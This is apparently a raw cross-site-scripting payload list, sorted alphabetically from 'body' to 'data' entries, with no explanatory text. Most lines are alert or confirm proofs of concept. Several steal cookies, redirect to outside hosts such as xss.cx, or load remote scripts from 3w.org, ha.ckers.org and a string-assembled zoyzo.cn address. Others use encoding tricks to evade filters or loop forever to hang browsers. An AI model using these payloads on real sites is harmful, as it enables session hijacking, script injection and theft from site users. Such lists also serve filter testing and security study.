<BODY BACKGROUND=”javascript:alert(‘XSS’);”>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<BODY BACKGROUND=”javascript:alert(XSS)”>
<BODY BACKGROUND=javascript:alert(XSS)>
<body background=javascript:alert(/xss/)></body>
<BODY BACKGROUND=”javascript:confirm(‘XSS’)”>
<body BACKGROUND=”javascript:document.vulnerable=true;”>
<body background=javascript:’”><script>alert(navigator.userAgent)</script>></body>
<body background=javascript:’”><script>alert(navigator.userAgent)</script>></body>
<body background=javascript:’”><script>alert(XSS)</script>></body>
body{background:url(JavAs cr ipt:alert(0))}
body{background:url(“javascript:alert(‘xss’)”)}
<body <body onload=;;;;;al:eval(‘al’+’ert(1)’);;>
</BODY></HTML>
<body id=XSS onscroll=eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<body language=vbsonload=alert-1
<body language=vbs onload=alert-1
<body language=vbsonload=alert-1
<body language=vbs onload=alert-1 // IE-8
<body language=vbs onload=confirm-1
<body language=vbs onload=window.location=’data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+’>
“><body language=vbs onload=window.location=’http://xss.cx'>
<body/onactivate=alert(1)>
<body/onactivate=URL=name//
<body onbeforeunload body onbeforeunload=”javascript:javascript:alert(1)”></body onbeforeunload>
<body onBeforeUnload body onBeforeUnload=”javascript:javascript:alert(1)”></body onBeforeUnload>
<body onblur body onblur=”javascript:javascript:alert(1)”></body onblur>
<body onblur=x onload=popup=1;>
<body onclick=”poc();”>
<body onerror=popup=1;><svg/onfocus=import>
<body onfocus=alert(1)>
<body onfocus=alert(93)>
<body onfocus body onfocus=”javascript:javascript:alert(1)”></body onfocus>
<body onFocus body onFocus=”javascript:javascript:alert(1)”></body onFocus>
<body onfocus=”location=&#039;javascrpt:alert(1)
<body onfocus=”location=&#039;javascrpt:alert(1) >123
<body onfocus=”location=’javascrpt:alert(1) >123
<body onhashchange=alert(1)>
<body/onhashchange=alert(1)><a href=#>clickit
<body/onhashchange=alert(1)><a href=#>click me
<body onhashchange=alert(1)><a href=#x>click this!#x
<body onhashchange=alert(94)><a href=#x>click this!#x
<body onhelp=alert(1)>press F1! (MSIE)
<body onhelp=alert(98)>press F1! (MSIE)
<body oninput=alert(document.domain)><input autofocus></br>
<body oninput=javascript:alert(1)><input autofocus>
<body onkeydown body onkeydown=”javascript:javascript:alert(1)”></body onkeydown>
<body onkeyup body onkeyup=”javascript:javascript:alert(1)”></body onkeyup>
<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
<body onload=a1={x:this.parent.document};a1.x.writeln(1);>
<body onload=;a2={y:eval};a1={x:a2.y(‘al’+’ert’)};;;;;;;;;_=a1.x;_(1);;;;
\”><BODY ONLOAD=alert(0x000123)>
<body onload=;;;;;;;;;;;_=alert;_(1);;;;
<body onload=alert(1)>
<body onload=”$})}}}});alert(1);({0:{0:{0:function(){0({“>
<body/onload=alert(25)>
<body onload=alert(91)>
<BODY ONLOAD=alert(‘hellox worldss’)>
<BODY ONLOAD=alert(iXSSi)>
<BODY ONLOAD=alert(‘XgSS’)>
><body/onload=alert(Xss)>
��><body/onload=alert(��Xss��)>
<body onLoad=”alert(‘XSS’);”
<body onLoad=”alert(‘XSS’);”
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(“;XSS”;)>;
<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert(“XSS”)>
<BODY onload!#$%&()*~+_.,:;?@[/|\]^`=alert(“XSS”)>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert(“XSS”)>
“><BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert(“XSS”)>
“><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
“;>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(“;XSS”;)>;
<;BODY ONLOAD=alert(‘;XSS’;)>;
<BODY ONLOAD=alert(‘XSS’)>
<BODY ONLOAD=alert(“XSS”)>
<BODY ONLOAD=alert(��XSS��)>
<BODY ONLOAD=alert(XSS)>
<BODY ONLOAD =alert(‘XSS’)>
><body/onload=alert(Xss-By-Muhaddi)>
<body onload=alert(/XSS/.source)>
“> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘X12SS’);}</SCRIPT><”
“> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘XSS’);}</SCRIPT><”
<body onload body onload=”javascript:javascript:alert(1)”></body onload>
<body onLoad body onLoad=”javascript:javascript:alert(1)”></body onLoad>
<BODY ONLOAD=confirm(‘XSS’)>
<body onload=”document.vulnerable=true;”>
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<body ONLOAD=document.vulnerable=true;>
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<body/onload=javascript:window.onerror=eval;throw&#039;=alert\x281\x29&#039;;
<body/onload=javascript:window.onerror=eval;throw’=alert\x281\x29';>
<body/onload=location=name//
<body/onload=location=write(top)//
<body/onload=&lt;! — &gt;&#10alert(1)>
<body/onload=&lt;! — &gt;&#10alert(1)>
<body/onload=&lt;! — &gt;&#10confirm(1)>
<body/onload=&lt;! — &gt;&#10confirm(1);prompt(/XSS/.source)>
><body/onload=&lt;! — &gt;&#10confirm(1);prompt(/XSS/.source)>
“<body/onload=&lt;! — &gt;&#10confirm(1);prompt(/XSS/.source)>”
“\”><body/onload=&lt;! — &gt;&#10confirm(1);prompt(/XSS/.source)>”,
<body onload=popup=1;>
<body onload=```${prompt``}`>
<body onload=prompt(1);>
<body/onload=self[/loca/.source%2b/tion/.source]=name//
<body/onload=this[/loca/.source%2b/tion/.source]=name//
<body/onload=URL=name//
<body onload=”’use strict’;throw new class extends Function{}(‘alert(1)’)``”>
<body onload=’vbs:Set x=CreateObject(“Msxml2.XMLHTTP”):x.open”GET”,”.”:x.send:MsgBox(x.responseText)’>
<body onLoad=”while(true) alert(‘XSS’);”>
<body onLoad=”while(true) alert(‘XSS’);”>
<body/onload=window[/loca/.source%2b/tion/.source]=name//
<body/����$/onload=x={doc:parent[��document��]};x.doc.writeln(1)
<body onMouseEnter body onMouseEnter=”javascript:javascript:alert(1)”></body onMouseEnter>
<body onMouseMove body onMouseMove=”javascript:javascript:alert(1)”></body onMouseMove>
<body onMouseOver body onMouseOver=”javascript:javascript:alert(1)”></body onMouseOver>
<body onorientationchange=alert(1)>
<body onorientationchange=alert(orientation)>
<body onpagehide body onpagehide=”javascript:javascript:alert(1)”></body onpagehide>
<body onPageHide body onPageHide=”javascript:javascript:alert(1)”></body onPageHide>
<body onpageshow=”alert(1)”>
<body onpageshow=alert(1)>
<body/onpageshow=alert(1)>
<body onpageshow=alert(92)>
<body onPageShow body onPageShow=”javascript:javascript:alert(1)”></body onPageShow>
<body/onpageshow=confirm()>//
<body onpageshow=top[‘ale’+’rt’]()>
<body onPopState body onPopState=”javascript:javascript:alert(1)”></body onPopState>
<body onPropertyChange body onPropertyChange=”javascript:javascript:alert(1)”></body onPropertyChange>
<body onresize=alert(1)>
<body onresize=alert(1)>press F12!
<body onresize=alert(97)>press F12!
<body onResize body onResize=”javascript:javascript:alert(1)”></body onResize>
<body onscroll=alert(1)>
<body onscroll=alert(1)><br><br><br><br>
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
<body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<body onscroll=alert(96)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
<body onscroll=alert(XSS)><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<body onunload body onunload=”javascript:javascript:alert(1)”></body onunload>
<body onUnload body onUnload=”javascript:javascript:alert(1)”></body onUnload>
<body onunload=”javascript:alert(‘XSS’);”>
<body rel=’popup=1;’onerror=popup=1; onload=x >
<body><script>hash=location.hash.slice(1);document.body.innerHTML=decodeURIComponent(hash);</script></body>
<body><script>hash=location.hash.slice(1);document.write(decodeURIComponent(hash));</script></body>
<body scroll=confirm(1)><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
<body/s/onload=x={doc:parent.document};x.doc.writeln(1)
<body src=1 href=1 onerror=”javascript:alert(1)”></body>
<body style=”height:1000px” onwheel=”alert(1)”>
<body style=”height:1000px” onwheel=”[DATA]”>
<body style=”height:1000px” onwheel=”[JS-F**k Payload]”> <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”[JS-F**k Payload]”>
<body style=”height:1000px” onwheel=”prom%25%32%33%25%32%36x70;t(1)”> <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”prom%25%32%33%25%32%36x70;t(1)”>
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body style=overflow:auto;height:1000px onscroll=alert(95) id=x>#x
<body><svg><x><script>alert(1)</script></x></svg></body>
<BODY(‘XSS’)>
body{xss:expression(alert(��Xss��))}
body{xss:expression(alert(Xss))}
body{xss:expression(alert(Xss-By-Muhaddi))}
body{xxx:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123,97,108,101,114,116,40,39,120,115,115,39,41,59,119,105,110,100,111,119,46,120,61,49,59,125)))}
<b onbeforescriptexecute=alert(185)>
<bonbeforescriptexecute=prompt()>
<b onclick=alert(1)>click me!
“><b/onclick=”javascript:window.window.window[‘confirm’](1)”>bold
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<;br size=\”;&;{alert(&#039;XSS&#039;)}\”;>;
<br size=”&{alert(‘XkSS’)}”>
<br size=”&{alert(‘XSS’)}”>
<br size=”&{alert(‘XSS’)}”>
<br size=\”&{alert(‘XSS’)}\”>
<;BR SIZE=”;&;{alert(‘;XSS’;)}”;>;
<BR SIZE=”&{alert(‘XSS’)}”>
<BR SIZE=”&{alert(XSS)}”> (netspace)
<BR SIZE=”&{confirm(‘XSS’)}”>
<br SIZE=”&{document.vulnerable=true}”>
<BR SIZE=”&{javascript:alert(1)}”>
<;/br style=a:expression(alert())>;
</br style=a:expression(alert())>
</br style=a:expression(alert())>
</br style=a:expression(alert(1))>
<brute contenteditable onblur=alert(1)>lose focus!
<brute contenteditable onfocus=alert(1)>focus this!
<brute contenteditable oninput=alert(1)>input here!
<brute contenteditable onkeydown=alert(1)>press any key!
<brute contenteditable onkeypress=alert(1)>press any key!
<brute contenteditable onkeyup=alert(1)>press any key!
<brute contenteditable onpaste=alert(1)>paste here!
//brutelogic.com.br/tests/status.html&msg=<script>alert(document.domain)
//brutelogic.com.br/webgun/test.php?p=<body/onhashchange=alert(document.domain)>
//brutelogic.com.br/webgun/test.php?p=<body/onresize=alert(document.domain)>
//brutelogic.com.br/webgun/test.php?p=<svg/onload=eval(name)>&name=alert(document.domain)
<brute onclick=alert(1)>clickme!
<brute onclick=alert(1)>click this!
<brute oncontextmenu=alert(1)>right click this!
<brute oncopy=alert(1)>copy this!
<brute oncut=alert(1)>copy this!
<brute ondblclick=alert(1)>double click this!
<brute ondrag=alert(1)>drag this!
<brute onmousedown=alert(1)>click this!
<brute onmousemove=alert(1)>hover this!
<brute onmouseout=alert(1)>hover this!
<brute onmouseover=alert(1)>hover this!
<brute onmouseup=alert(1)>click this!
<brute style=font-size:500px onmouseover=alert(1)>0000
<brute style=font-size:500px onmouseover=alert(1)>0001
<brute style=font-size:500px onmouseover=alert(1)>0002
<brute style=font-size:500px onmouseover=alert(1)>0003
<b <script>alert(1)</script>0
<b <script>alert(1)//</script>0</script></b>
<b “<script>alert(1)</script>”>hola</b>
<b><script<b></b><alert(1)</script </b></b>
<B=”<SCRIPT>confirm(1)</SCRIPT>”>
<B <SCRIPT>confirm(1)</SCRIPT>>
b={{set(‘_rootDataHost’,ownerdefaultView)}}
[?=btoa][?`~)e`][?`OE’2UirU+`.split`1`[-~0]]`$${?`zoD`+”($)”}$``0${btoa(‘|o&|Y’).match(/[h-te]*/)+’(/’+btoa(‘n\x8a-3,’)+’/)’}`
b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name
b=\”URL(\\”\”;
<button autofocus onfocus=confirm(2)>
<button autofocus=x onchange=’import’onfocus=popup=1; >
<button data=popup=1; id=’x’onfocus=popup=1; >
<button form=test onformchange=alert(1)>//INJECTX
<button form=x>xss<form id=x action=”javas&Tab;cript:alert(1)”//
<button>’><img src=x onerror=confirm(0);></button>
“<button>’><img src=x onerror=confirm(0);></button>”
<button ‘ onclick=alert(1)//>*/alert(1)//
<button/onclick=alert(20)>M
<button onclick=popup=1;>
<button onclick=”window.open(‘http://xss.cx/::Error138 ‘);”>CLICKME
<button onfocus=alert(1) autofocus>
<button onmousemove=”javascript:alert(1)”>renwa
<button><select%20name=xss><option>%26%23x000000003c;script%26%23x000000003e;alert(1)%26%23x000000003c;/script%26%23x000000003e;
<button><select%20name=xss><option>%26%23x3c;script%26%23x3e;
buttons.html(button.getAttribute(“data-text”));
“><button><svg/onload=v=prompt;v(/XSS/.source);v(0)></button>
$(“button”).val(“<iframe src=vbscript:confirm(1)>”)
`<b\x20#x (click)=”x.inn\x65rHTML=’\x3ciframe onload=alert(1)\x3e’”>CLICK</b>`
B+Z+J+W+O;
c={{}}
%c0��//(0000%0dconfirm(1)//
“ = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
‘ = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
%c0u003cimg+src%3d1+onerror%3dalert(/xss/)+%c0u003e
%c1;alert(/xss/);//
c2=c.getContext(‘2d’);
c2=c.getContext(2d);
? (%c4%b0).toLowerCase() => i
? (%c4%b1).toUpperCase() => I
? (%c5%bf) .toUpperCase() => S
‘ = %CA%B9
“ = %CA%BA
%CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)>
%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert(1)%EF%BC%9E
%CA%BA%EF%BC%9E%EF%BC%9Csvg onload %EF%BC%9Dalert%EF%BC%881%EF%BC%89%EF%BC%9E
?callback=javascript:alert(1)”,
callback({“name”:”[0xc0]\u003cimg src=1 onerror=alert(/xss/) [0xc0]\u003e”});
callback({“name”:”u003cimg src=1 onerror=alert(/xss/) u003e”})
?callback=<script/src=?callback=alert(document.domain)//></script>
<canvas onclick=”popup=1;”>
Carriage Return Injected##<script%0Daaa>alert(1)</script%0Daaaa>
\”))}catch(e){alert(1)}//
\”));}catch(e){confirm(document.domain);}//
\”));}catch(e){confirm(document.domain)}//
;\”))}catch(e) {confirm(document.location);}//
;\\”))}catch(e) {confirm(document.location);}//
\”));}catch(e){x=window.open(‘http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}//
//@cc_on-alert(1))
/*@cc_on-alert(1))
<![CDATA”:
<![CDATA[<h1>My HTML content</h1>]]>
![CDATA[<! — ]]<script>alert(‘XSS’);// →</script>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘XSS’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<![CDATA[<script>confirm(document.domain)</script>]]>
<![CDATA[<script>var n=0;while(true){n;}</script>]]>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
c=d.createElement(‘canvas’);
c=d.createElement(canvas);
<center><h1 id=’text’>Click here to XSS!</h1></center>
charset=utf-
charset=utf- 32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
charset=utf-8&v=><img src=x onerror=prompt(0);>
charset=utf-8&v=��><img src=x onerror=prompt(0);>
c.height=480;
Chrome (Any character \x01 to \x20)
chrome&jsonp=alert(1);
Chrome: this[Object[“keys”](this)[146]](1)
‘`”><*chr*script>log(*num*)</script>
<cite><a href=”javascript:confirm(1);”>XSS cited!</a></cite>
c=\”javascript&#058;\”;
```${``[class extends[alert``]{}]}```
[class extends[alert````]{}]
,class extends[]/alert(1){}
!class extends`${alert(1)}```{}
class extends[]/alert(1){}
class XSS {public static function main() {flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”);}}
[Click here](javascript:alert(1))
?clickTAG=javascript:alert(1)”,
?clickTAG=javascript:alert(1)&TargetAS=”,
<code onmouseover=a=eval;b=alert;a(b(/g/.source));>HI</code>
Code Reuse Regular Script
: = &colon;
[color=red’ onmouseover=”alert(‘xss’)”]mouse over[/color]
[color=red’ onmouseover=”alert(‘xss’)”]mouse over[/color]
[color=red width=expression(alert(123))][color]
[color=red width=expression(alert(123))][color]
<command onmouseover=”javascript:confirm(0);”>Save //
<command onmouseover=”\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6 9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B”>Save</command>
<command onmouseover=”\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6 9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B”>Save</command>
<Command onmouseover=”\ X6A \ x61 \ x76 \ x61 \ x53 \ x43 \ x52 \ x49 \ x50 \ x54 \ x26 \ x63 \ x6F \ x6C \ x6F \ x6E \ x3B \ x63 \ x6F \ x6E \ x6 6 \ x69 \ x72 \ x6D \ x26 \ x6C \ x70 \ x61 \ x72 \ x3B \ x31 \ x26 \ x72 \ x70 \ x61 \ x72 \ x3B “> Save </ command>
<comment><img src=”</comment><img src=x onerror=alert(1)//”>
<comment><img src=”</comment><img src=x onerror=alert(1))//”>
<comment><img src=”</comment><img src=x onerror=alert(/ourren_demo/)//”>
<comment><img src=”</comment><img src=x onerror=javascript:alert(1))//”>
Components.lookupMethod(self, ‘alert’)(1)
Components.lookupMethod(self, ‘confirm’)(1)
=confirm(1);>”;>
-confirm(1)-
‘-/”/-confirm(1)//’
‘-confirm`1`-’
“-confirm`1`-”
\’);confirm(1);//
\”;confirm(1);//
+confirm(1) —
+confirm(1)
��;confirm(1)//
confirm(1)”.replace(/.+/,eval)//
confirm`1`; var something = `abc${confirm(1)}def`; ``.constructor.constructor`confirm\`1\````;
confirm(1)>>>/xss
‘+confirm(9)&&null==’
confirm = co\u006efir\u006d
Confirm = co\u006efir\u006d
-(confirm)(document.domain)//
\”;confirm(document.location);//
confirm(document.location)
confirm(document.selection.createRange().getBookmark())
confirm(location.hostname)
‘;confirm(String.fromCharCode(88,83,83))//’;confirm(String.fromCharCode(88,83,83))//”;
confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))// —
‘;confirm(String.fromCharCode(88,83,83))//’;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))// — </SCRIPT>”>’><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>
‘;confirm(String.fromCharCode(88,83,83))//\’;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))//\”;confirm(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>=&{}
confirm(window.toStaticHTML(‘<base href=”http://xss.cx/"></base>'));
confirm(window.toStaticHTML(‘<label style=”overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;” for=”submit”>Click’));
confirm(window.toStaticHTML(‘<marquee>foo</marquee>’));
“; ||confirm(‘XSS’) || “
confirm(<xss>xs{[function::status]}s</xss>)
[][?=’constructor’][?](‘alert(1)’)()
[].constructor.constructor(‘alert(1)’)()
[].constructor.constructor(“alert” + “(1)”)()
[][‘constructor’][‘constructor’](‘alert(1)’)()
{{constructor.constructor(‘alert(1)’)()}}
${‘’.constructor.constructor(‘alert(1)’)()}
{{constructor.constructor(‘alert(1)’)()}} <div ng-app> {‘a’.constructor.fromCharCode=[].join; ‘a’.constructor[0]=’\u003ciframe onload=alert(/Backdoored/)\u003e’;}} </div> <div ng-app> {{‘a’.constructor.prototype.charAt=[].join; $eval(‘x=alert(1)’)+’’}} </div> <script> onload=function(){document.write(String.fromCharCode(97));}</script> <SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT> <SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG SRC=javascript:alert(“XSS”)> <IMG “””> <SCRIPT> Alert (“XSS”) </ SCRIPT> “> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=jav..??..S’)> Unicode encoding ( 9 ) 7 of UTF-8 is no semicolon ( calculator ) <IMG SRC=jav..??..S’)> <IMG SRC=java..??..XSS’)> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC = “jav ascript: alert (‘XSS ‘ ) ; “ > <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”javascript:alert(‘XSS’)”> <script> z = ‘document.’ </ script> <script> z = z + ‘write (“‘ </ script> <script> z = z + ‘<script’ </ script> <script> z = z + ‘src = ht’ </ script> <script> z = z + ‘tp :/ / ww’ </ script> <script> z = z + ‘w.zoyzo’ </ script> <script> z = z + ‘. cn / 1.’ </ script> <script> z = z + ‘js> </ sc’ </ script> <script> z = z + ‘ript> “)’ </ script> <script> eval_r (z) </ script> perl-e ‘print “<IMG SRC=javascript:alert(“XSS”)>”;’> out perl-e ‘print “<SCRIPT> alert (“ XSS “) </ SCRIPT>”;’> out <IMG SRC=” javascript:alert(‘XSS’);”> <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js"> </ SCRIPT> <BODY Onload!#$%&()*~+-_.,:;?@[/|]^`=alert(“XSS”)> <SCRIPT/SRC=”http://3w.org/XSS/xss.js"> </ SCRIPT> << SCRIPT> alert (“XSS”) ;/ / << / SCRIPT> <SCRIPT SRC = http://3w.org/XSS/xss.js? <B> <SCRIPT SRC=//3w.org/XSS/xss.js> <IMG SRC = “javascript: alert (‘XSS’)” <iframe src=http://3w.org/XSS.html> <SCRIPT> A = / XSS / alert (a.source) </ SCRIPT> “; alert (‘XSS’) ;/ / </ TITLE> <SCRIPT> alert (“XSS”); </ SCRIPT> <INPUT SRC=”javascript:alert(‘XSS’);”> <BODY BACKGROUND=”javascript:alert(‘XSS’)”><BODY(‘XSS’)> <IMG DYNSRC=”javascript:alert(‘XSS’)”> <IMG LOWSRC=”javascript:alert(‘XSS’)”> <BGSOUND SRC=”javascript:alert(‘XSS’);”> <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css"> <STYLE> Li {list-style-image: url (“javascript: alert (‘XSS’)”);} </ STYLE> <UL> <LI> XSS <IMG SRC=’vbscript:msgbox(“XSS”)’> </ STYLE> <UL> <LI> XSS %3Cscript%3Ealert(%22XSS%22)%3C/script%3E &lt;script&gt;alert(“XSS”)&lt;/script&gt; &lt;script&gt;alert(“XSS”)&lt;/script&gt; &lt;script&gt;alert(%34XSS%34)&lt;/script&gt; &lt;script&gt;alert(‘XSS’)&lt;/script&gt; callback=javascript://anything%0D%0A%0D%0Awindow.alert(1)// javascript:alert(document.cookie);// ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC=”javascript:alert(‘XSS’);”> <a onmouseover=”alert(document.cookie)”>xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a>
constructor.constructor(“aler”+”t(3)”)();
[][?=’constructor’][?](‘ert(‘.padStart(6,’al’).padEnd(8,’1)’))()
;[].constructor.prototype.join=function(){return’pwnd’};eval(‘alert(1)’)
[][?=/constructor/.source][?](/alert(1)/.source)()
[][?=/constructor/.source][?](/alert(1)/.source)()for(n in{constructor:0})[][?=n][?](/alert(1)/.source)())
<% contenteditable onresize=alert(1)>
continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;
<ControllerColor>C0C0C0</ControllerColor>
# credit to rsnake
→cript:alert(‘XSS’)”&gt;</B></I></XML> <SPAN DATASRC=”#xss” DATAFLD=”B”
<cta id=ANSES actionType=download data=javascript://adobe.com%0aalert(document.domain)><![CDATA[ CLICK HERE ]]></cta>
{{c=toString.constructor;p=c.prototype;p.toString=p.call;[“a”,”alert(1)”].sort(c)}}
ctx.call(“fun”)
ctx.eval(‘1+1’)
ctx.eval(“var fun = () => ({ foo: 1 });”)
ctx = py_mini_racer.MiniRacer()
c.width=500;x.font=’9em”’for(i=3;i — ;x.fillText(T[0]+T[1]+T[2],40,200))t%6<i+2?T[i]=[…’’][(i*t+9*t|0)%5]:S
c.width=640;
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
d=0||’une’+’scape’||0;a=0||’ev’+’al’||0;b=0||’locatio’;b+=0||’n’||0;c=b[a];d=c(d);c(d(c(b)))
#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
d=\”alert(‘XSS’);\\”)\”;
.data
data&colon;%2f%2f;ba se64;;//,P HNjcmlw dD5hbG VydC gxKTwvc2NyaXB0Pg= =
DATAFORMATAS=”HTML”></SPAN>
<*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*=”customLog(‘*datahtmlelements* *dataevents*’)”></*datahtmlelements*>
<*datahtmlelements* *dataevents*=”javascript:parent.customLog(‘*datahtmlelements* *dataevents*’)”></*datahtmlelements*>
<*datahtmlelements* *datahtmlattributes*=”javascript:parent.customLog(‘*datahtmlelements* *datahtmlattributes*’)”></*datahtmlelements*>
data:[<MIME-type>][;charset=<encoding>][;base64],<data>
data:),<script>alert(1)</script>
data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))>
data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiY29va2llOiAiK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=#?someRandomParam1=blah&someRandomParam2=blah
data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe2FsZXJ0KGRvY3VtZW50LmZyYW1lc1swXS5kb2N1bWVudC5jb29raWUpfWZ1bmN0aW9uIGIoKXt2YXIgaT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdpZnJhbWUnKTtpLnN0eWxlPSd3aWR0aDowcHg7aGVpZ2h0OjBweDt2aXNpYmlsaXR5OmhpZGRlbic7aS5zcmMgPSAnaHR0cCc7aS5zcmMrPWRvY3VtZW50LnJlZmVycmVyLmxlbmd0aD8nJzoncyc7aS5zcmMrPSc6Ly9mb3J1bS5hbnRpY2hhdC5ydS9jc3MvYS5jc3MnO2kub25sb2FkPWZ1bmN0aW9uKCl7YSgpfTtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGkpfTwvc2NyaXB0Pjxib2R5IG9ubG9hZD1iKCk+
